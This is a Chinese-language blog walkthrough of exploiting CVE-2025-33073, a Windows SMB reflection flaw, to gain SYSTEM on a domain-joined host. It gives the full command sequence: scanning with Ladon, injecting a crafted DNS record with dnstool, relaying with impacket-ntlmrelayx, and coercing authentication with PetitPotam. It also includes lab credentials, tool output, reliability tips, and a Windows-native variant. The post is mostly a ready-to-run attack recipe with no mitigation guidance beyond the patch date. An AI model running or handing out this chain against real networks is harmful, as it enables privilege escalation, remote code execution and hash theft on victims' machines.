漏洞概述
Windows SMB 客户端中发现一项严重漏洞(CVE-2025-33073),允许普通域用户在未启用服务器端 SMB 签名的情况下,借助恶意 SMB 服务器进行权限提升,最终获得本地 SYSTEM 级别权限。攻击流程如下:
攻击者诱使受害机向其恶意 SMB 服务器发起连接。
恶意服务器在 Kerberos 认证阶段注入特制子密钥,并将伪造的 AP-REQ 票据中继回受害主机。
SMB 客户端误信该票据,将凭证提升为 SYSTEM 令牌。
攻击者借助该高权限令牌,可在目标机器上执行任意代码。
该漏洞影响所有未强制要求 SMB 签名的已加入域的 Windows 版本(除域控制器外),包括 Windows 10/11(直到 23H2)和 Windows Server 2008—2025 等。微软已于 2025 年 6 月 10 日的补丁星期二中发布修复补丁。
漏洞环境
| 服务 / 主机 |
IP 地址 |
操作系统 |
备注 |
凭据 |
| SMB (主机 A) |
192.168.1.14 |
Win 10 |
未启用SMB签名 |
域用户:win10
密码:k8gege520? |
| SMB (主机 B) |
192.168.1.142 |
Win Server 2016 |
— |
— |
| 攻击机 (Kali) |
192.168.1.100 |
Kali Linux |
— |
— |
SMB协议NTLM信息探测windows系统信息
1
| Ladon.exe np 192.168.1.1/24 smbinfo
|
结果如下 目标机器win10未启用SMB签名
1
2
3
4
5
|
SMB: 192.168.1.14 WIN10 (Win10-Enterprise-2016-LTSB-14393 10.0.14393 Win 10/Win 2016, 1607) Domain:K8GEGE Dns:k8gege.org SMBSigning:False
SMB: 192.168.1.18 WIN2008 (Win2008-R2-Enterprise-7601-SP1 6.1.7601 ) Domain:K8GEGE Dns:k8gege.org SMBSigning:False
SMB: 192.168.1.142 WIN2016 (Win2016-Datacenter 10.0.14393) Domain:K8GEGE Dns:k8gege.org SMBSigning:True
|
添加DNS记录
由机器名 或 localhost 加 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 组成
1
2
|
python3 dnstool.py -u k8gege\\win10 -p k8gege520? -r win101UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.1.100 --action add 192.168.1.142
|
![使用http访问查看图片]()
启动监听
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| impacket-ntlmrelayx -t 192.168.1.14 -smb2support -ts -c whoami
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[2025-10-05 22:38:13] [*] Protocol Client DCSYNC loaded..
[2025-10-05 22:38:13] [*] Protocol Client IMAPS loaded..
[2025-10-05 22:38:13] [*] Protocol Client IMAP loaded..
[2025-10-05 22:38:13] [*] Protocol Client MSSQL loaded..
[2025-10-05 22:38:13] [*] Protocol Client SMTP loaded..
[2025-10-05 22:38:13] [*] Protocol Client HTTPS loaded..
[2025-10-05 22:38:13] [*] Protocol Client HTTP loaded..
[2025-10-05 22:38:13] [*] Protocol Client SMB loaded..
[2025-10-05 22:38:13] [*] Protocol Client RPC loaded..
[2025-10-05 22:38:14] [*] Protocol Client LDAP loaded..
[2025-10-05 22:38:14] [*] Protocol Client LDAPS loaded..
[2025-10-05 22:38:15] [*] Running in relay mode to single host
[2025-10-05 22:38:15] [*] Setting up SMB Server on port 445
[2025-10-05 22:38:15] [*] Setting up HTTP Server on port 80
[2025-10-05 22:38:15] [*] Setting up WCF Server on port 9389
[2025-10-05 22:38:15] [*] Setting up RAW Server on port 6666
[2025-10-05 22:38:15] [*] Multirelay disabled
[2025-10-05 22:38:15] [*] Servers started, waiting for connections
|
强制NTLM认证
1
2
3
|
python3 PetitPotam.py -d k8gege.org -u win10 -p k8gege520? win101UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.1.14
|
![使用http访问查看图片]()
PS: 失败就多执行几次,还是不行清空DNS,还原机器,重新测试,测试win10 1607 成功率高
失败环境: win7 win11 和 2012 测试几百次 都不成功,错误RPC不可用或认证失败(未深究)
成功DumpHash
![使用http访问查看图片]()
成功执行命令 (system权限)
![使用http访问查看图片]()
Windows版本 (动作多比较危险)
1.使用Ladon关闭445端口(需管理员权限,重启系统后生效)
2.再执行NTLM监听执行命令
3.防火墙放行 ntlmrelayx
1
2
3
4
5
6
7
8
9
|
dnstool.exe -u k8gege\win2008 -p k8gege520? -r win20081UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.1.80 --action add 192.168.1.142
PetitPotam.exe -d k8gege.org -u win10 -p k8gege520? win101UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.1.14
Ladon.exe CloseSmb 445
ntlmrelayx.exe -t 192.168.1.14 -smb2support -ts -c whoami
|
![使用http访问查看图片]()
转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org
